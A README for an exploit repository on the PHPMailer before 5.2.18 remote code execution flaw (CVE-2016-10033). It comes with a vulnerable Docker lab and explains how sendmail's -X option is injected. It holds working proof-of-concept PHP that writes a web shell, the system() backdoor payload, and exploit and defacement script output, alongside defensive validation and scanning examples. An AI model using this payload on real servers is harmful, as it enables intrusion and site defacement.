PHPMailer < 5.2.18 Remote Code Execution exploit and vulnerable container

PHPMailer < 5.2.18 Remote Code Execution


PHPMailer is the world's most popular transport class, with an estimated 9 million users worldwide. Downloads continue at a significant pace daily. It is used by many open-source projects: WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla! and many more.

PHPMailer before version 5.2.18 suffers from a vulnerability that can lead to remote code execution (RCE). The mailSend function in the isMail transport in PHPMailer, when the Sender property is not set, might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) sequence in a crafted From address.

Vulnerable environment

To set up a vulnerable environment for your test you will need Docker installed; then just run the following command:

docker run --rm -it -p 8080:80 vulnerables/cve-2016-10033

It will spawn a vulnerable web application on your host on port 8080.

[Screenshot: the vulnerable web application]

Exploit

To exploit this target just run:

./exploit.sh host:port

If you are using this vulnerable image, you can just run:

./exploit.sh localhost:8080

After exploitation, a file called backdoor.php will be stored in the web root. The exploit will then drop you into a shell from which you can send commands to the backdoor:

./exploit.sh localhost:8080
[+] CVE-2016-10033 exploit by opsxcq
[+] Exploiting localhost:8080
[+] Target exploited, acessing shell at http://localhost:8080/backdoor.php
[+] Checking if the backdoor was created on target system
[+] Backdoor.php found on remote system
[+] Running whoami
www-data
RemoteShell> 

And that's it, you have your shell. There is another exploit, which illustrates another use case.

./deface.sh localhost:8080
[+] CVE-2016-10033 exploit by opsxcq
[+] Exploiting localhost:8080
[+] Target exploited, acessing shell at http://localhost:8080/backdoor.php
[+] Checking if the backdoor was created on target system
[+] Backdoor.php found on remote system
[+] Placing your message in the server
[+] Job done, exiting

If you visit the page again, you will see this:

[Screenshot: the defaced page]

Vulnerable code

Before this commit, class.phpmailer.php did not, in a certain scenario, filter special characters in the sender's email address. This flaw can lead to remote code execution via the mail() function here.

Analysing the code, there is no filter in the mailSend() function:

        $params = null;
        //This sets the SMTP envelope sender which gets turned into a return-path header by the receiver
        if (!empty($this->Sender)) {
            $params = sprintf('-f%s', $this->Sender);
        }

$this->Sender is appended directly to the $params variable. It was validated earlier by the validateAddress() function, but because that function follows the RFC 3696 specification, it allows certain characters that break things. In this case, quotes:

In addition to quoting using the backslash character, conventional double-quote characters may be used to surround strings. For example

"Abc@def"@example.com

"Fred Bloggs"@example.com

are alternate forms of the first two examples above. These quoted forms are rarely recommended, and are uncommon in practice, but, as discussed above, must be supported by applications that are processing email addresses. In particular, the quoted forms often appear in the context of addresses associated with transitions from other systems and contexts; those transitional requirements do still arise and, since a system that accepts a user-provided email address cannot "know" whether that address is associated with a legacy system, the address forms must be accepted and passed into the email environment.

You can read the whole RFC here if you want. Also, if the PHP version is older than 5.2.0 and PCRE is not installed, the $patternselect variable in validateAddress() will be set to noregex. The input then avoids any regex check and only passes through a small verification:

            case 'noregex':
                //No PCRE! Do something _very_ approximate!
                //Check the address is 3 chars or longer and contains an @ that's not the first or last char
                return (strlen($address) >= 3
                    and strpos($address, '@') >= 1
                    and strpos($address, '@') != strlen($address) - 1);

Then the code flow reaches the mailPassthru() function which, if running in safe_mode, won't be vulnerable to this flaw, as the following code shows:

        //Can't use additional_parameters in safe_mode
        //@link http://php.net/manual/en/function.mail.php
        if (ini_get('safe_mode') or !$this->UseSendmailOptions or is_null($params)) {
            $result = @mail($to, $subject, $body, $header);
        } else {
            $result = @mail($to, $subject, $body, $header, $params);
        }

But if it isn't running in safe_mode, our special parameter is passed to mail() and, with a bit of luck, a file containing whatever we want is written wherever we chose.

Notes about PHP mail() function exploitation

Exploitation of PHP's mail() function isn't a new thing, but it is still alive and people still use it. To explain how it works, let's look at how mail() is defined:

bool mail ( string $to , string $subject , string $message [, string $additional_headers [, string $additional_parameters ]] )

There are several exploitation methods with different results; we will focus on exploitation of the 5th parameter to get Remote Code Execution (RCE). The $additional_parameters parameter is used to pass additional flags as command-line options to the program configured to send the email. That program is defined by the sendmail_path configuration setting.

A security note from the official PHP documentation:

The additional_parameters parameter can be used to pass additional flags as command line options to the program configured to be used when sending mail, as defined by the sendmail_path configuration setting. For example, this can be used to set the envelope sender address when using sendmail with the -f sendmail option.

This parameter is escaped by escapeshellcmd() internally to prevent command execution. escapeshellcmd() prevents command execution, but allows to add additional parameters. For security reasons, it is recommended for the user to sanitize this parameter to avoid adding unwanted parameters to the shell command.
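The two points above (validateAddress() accepting RFC 3696 quoted forms, and escapeshellcmd() stopping command execution but not the addition of further options) suggest where the control has to sit: before the value is used to build $additional_parameters. The following is an added example, not PHPMailer's code or the repository's exploit; the function names are hypothetical, and it replaces the $params logic from mailSend() with a deliberately narrow allow-list so that nothing needing escaping ever reaches mail().

```php
<?php
// Added example, not PHPMailer's code: build the sendmail "-f" envelope-sender
// parameter only from an address that passes a deliberately narrow allow-list,
// so the RFC 3696 quoted forms that validateAddress() accepts never reach the
// $additional_parameters argument of mail(). Function names are hypothetical.

/**
 * True only for addresses built from a restricted, shell-neutral character set:
 * no quotes, backslashes, whitespace or shell metacharacters. Stricter than
 * RFC 3696 on purpose; quoted local parts like "Fred Bloggs"@example.com fail.
 */
function isShellSafeAddress(string $address): bool
{
    $label = '[A-Za-z0-9](?:[A-Za-z0-9\-]*[A-Za-z0-9])?';
    return (bool) preg_match(
        '/^[A-Za-z0-9._%+\-]+@' . $label . '(?:\.' . $label . ')+$/',
        $address
    );
}

/**
 * Same shape as the $params logic in mailSend(), but refuses to emit "-f" for
 * anything that is not shell-safe. A null return means mailPassthru() would
 * call mail() with four arguments, i.e. no extra command-line options at all.
 */
function buildSenderParams(?string $sender): ?string
{
    if ($sender === null || $sender === '') {
        return null;
    }
    if (!isShellSafeAddress($sender)) {
        // Log the rejection (useful for detection) and fall back to "no -f".
        error_log('Refusing unsafe envelope sender: ' . json_encode($sender));
        return null;
    }
    // The allow-list, not escaping, is the control here: escapeshellcmd() in
    // mail() leaves paired quotes and spaces (which separate extra options) alone.
    return '-f' . $sender;
}

// Constructed sample inputs: an ordinary address, the RFC 3696 quoted form
// (valid per validateAddress(), rejected here) and one carrying a space.
$samples = [
    'alice@example.com',
    '"Fred Bloggs"@example.com',
    'bob@example.com -Xanything',
];
foreach ($samples as $s) {
    $params = buildSenderParams($s);
    printf("%-30s => %s\n", $s, $params ?? 'rejected, mail() gets no 5th argument');
}
```

Rejecting rather than escaping is the point of the design: the documentation note above says escapeshellcmd() only prevents command execution, so any character that can separate one option from the next has to be excluded up front, and a rejected sender should simply fall back to the four-argument mail() call that mailPassthru() already uses when $params is null.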

Among the additional parameters that can be injected, we will use -X to exploit this flaw. More about the -X parameter:

-X logfile
Log all traffic in and out of mailers in the indicated log file. This should only be used as a last resort for debugging mailer bugs. It will log a lot of data very quickly.

There are also some other interesting parameters that you should know that exist:

-Cfile
Use alternate configuration file. Sendmail gives up any enhanced (set-user-ID or set-group-ID) privileges if an alternate configuration file is specified.

And

-O option=value
Set option option to the specified value. This form uses long names.

For the -O option, QueueDirectory is the most interesting one: it selects the directory in which messages are queued.

If you want to read the whole list of parameters and options, just run man sendmail or read it online here.

Based on this information, and the ability to control at least one of the other parameters, we can exploit the host. Below are the steps for a successful exploitation:

  • Control $additional_parameters and another mail() parameter
  • Know a writable directory on the target host which is accessible via the target system and user (www-data for example). Usually this directory can be anything below the webroot (/var/www/html on other systems, /www in this example)
  • Any PHP payload that you want; we are using a simple system() payload in this example, with a bit of base64 and some special characters | to make it easier to parse.
  • Just assemble everything together!

Remember that the -X option writes the log file, which will contain your PHP payload among the log information, in the directory that you specify. An example of vulnerable PHP code:

$to = '[email protected]';
$subject = '<?php echo "|".base64_encode(system(base64_decode($_GET["cmd"])))."|"; ?>';
$message = 'Pwned';
$headers = '';
$options = '-OQueueDirectory=/tmp -X/www/backdoor.php';
mail($to, $subject, $message, $headers, $options);

If you execute the code above, it will create a log file at /www/backdoor.php; this is the essence of this exploit.

Payload

Below is the payload used in this example:

<?php echo "|".base64_encode(system(base64_decode($_GET["cmd"])))."|"; ?>

I wanna chase bugs, now what ?

Want an easy, one-command way to try to spot this flaw? Remember this magic grep command!

grep -r -n --include "*.php" "mail(.*,.*,.*,.*,.*)" *

Running it against this repository results in:

src/class.phpmailer.php:700:            $result = @mail($to, $subject, $body, $header, $params);
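The grep above only matches when all five arguments sit on one line, and it also fires on the word mail inside comments and strings. As an added example (not part of the repository), the scanner below uses PHP's own tokenizer to find calls to the global mail() that pass the 5th argument, whatever the formatting; scanTree(), the helper names and the embedded sample source are constructed for this example.

```php
<?php
// Added example, not from the repository: a token-based scanner for calls to
// PHP's global mail() that pass the 5th ($additional_parameters) argument.
// Unlike the one-line grep above it copes with calls split across lines and
// ignores "mail(" inside strings and comments. Helper names are hypothetical.

/** Previous token that is neither whitespace nor a comment, or null. */
function prevSignificant(array $tokens, int $i)
{
    for ($j = $i - 1; $j >= 0; $j--) {
        $t = $tokens[$j];
        if (is_array($t) && in_array($t[0], [T_WHITESPACE, T_COMMENT, T_DOC_COMMENT], true)) {
            continue;
        }
        return $t;
    }
    return null;
}

/**
 * Returns [['line' => int, 'args' => int], ...] for every call to mail()
 * (or \mail()) in $source that passes at least $minArgs arguments.
 */
function findMailCalls(string $source, int $minArgs = 5): array
{
    $tokens = token_get_all($source);
    $n = count($tokens);
    $nameTypes = [T_STRING];
    if (defined('T_NAME_FULLY_QUALIFIED')) {   // PHP 8 tokenizes "\mail" as one token
        $nameTypes[] = T_NAME_FULLY_QUALIFIED;
    }
    $hits = [];
    for ($i = 0; $i < $n; $i++) {
        $t = $tokens[$i];
        if (!is_array($t) || !in_array($t[0], $nameTypes, true)
            || strcasecmp(ltrim($t[1], '\\'), 'mail') !== 0) {
            continue;
        }
        // Skip definitions, methods and static calls: function mail(), $x->mail(), X::mail().
        $prev = prevSignificant($tokens, $i);
        if (is_array($prev) && in_array($prev[0], [T_FUNCTION, T_OBJECT_OPERATOR, T_DOUBLE_COLON], true)) {
            continue;
        }
        // The name must be followed by "(" (whitespace allowed in between).
        $j = $i + 1;
        while ($j < $n && is_array($tokens[$j]) && $tokens[$j][0] === T_WHITESPACE) {
            $j++;
        }
        if ($j >= $n || $tokens[$j] !== '(') {
            continue;
        }
        // Count top-level commas up to the matching ")"; nested (), [] and
        // interpolated {$...} blocks are tracked so their commas are ignored.
        $depth = 0; $commas = 0; $nonEmpty = false;
        for ($k = $j; $k < $n; $k++) {
            $tk = $tokens[$k];
            $opensCurly = is_array($tk) && in_array($tk[0], [T_CURLY_OPEN, T_DOLLAR_OPEN_CURLY_BRACES], true);
            if ($tk === '(' || $tk === '[' || $tk === '{' || $opensCurly) {
                $depth++;
            } elseif ($tk === ')' || $tk === ']' || $tk === '}') {
                if (--$depth === 0) { break; }
            } elseif ($depth === 1 && $tk === ',') {
                $commas++;
            } elseif (!(is_array($tk) && $tk[0] === T_WHITESPACE)) {
                $nonEmpty = true;
            }
        }
        $args = $nonEmpty ? $commas + 1 : 0;
        if ($args >= $minArgs) {
            $hits[] = ['line' => $t[2], 'args' => $args];
        }
    }
    return $hits;
}

/** Scans every *.php file under $dir; returns ['path:line' => argumentCount]. */
function scanTree(string $dir): array
{
    $out = [];
    $it = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS));
    foreach ($it as $file) {
        if (strtolower($file->getExtension()) !== 'php') { continue; }
        foreach (findMailCalls((string) file_get_contents($file->getPathname())) as $h) {
            $out[$file->getPathname() . ':' . $h['line']] = $h['args'];
        }
    }
    return $out;
}

// Constructed sample: "mail(" in a comment and in a string (must not count),
// a four-argument call (safe) and a five-argument call spread over lines.
$sample = <<<'PHP'
<?php
// mail($a, $b, $c, $d, $e) in a comment must not count
$x = "mail(1,2,3,4,5) in a string must not count";
$ok = @mail($to, $subject, $body, $header);
$bad = @mail(
    $to,
    $subject,
    "Hello {$name}, see " . implode(', ', $items),
    $header,
    $params
);
PHP;

foreach (findMailCalls($sample) as $h) {
    printf("line %d: mail() called with %d arguments\n", $h['line'], $h['args']);
}
// On a real code base (hypothetical path): print_r(scanTree('/path/to/project'));
```

Run against the sample it reports only the multi-line call on line 5 with 5 arguments; the comment, the string and the four-argument call are skipped. A hit means the 5th argument is in play and the next question for a reviewer is whether any user-controlled value can reach it, as it does through $this->Sender in the vulnerable mailSend().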

Credits

This vulnerability was found by Dawid Golunski.

Disclaimer

This or any previous program is for educational purposes ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that I (opsxcq) am not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (data loss, system crash, system compromise, etc.) caused by the use of these programs is not opsxcq's responsibility.
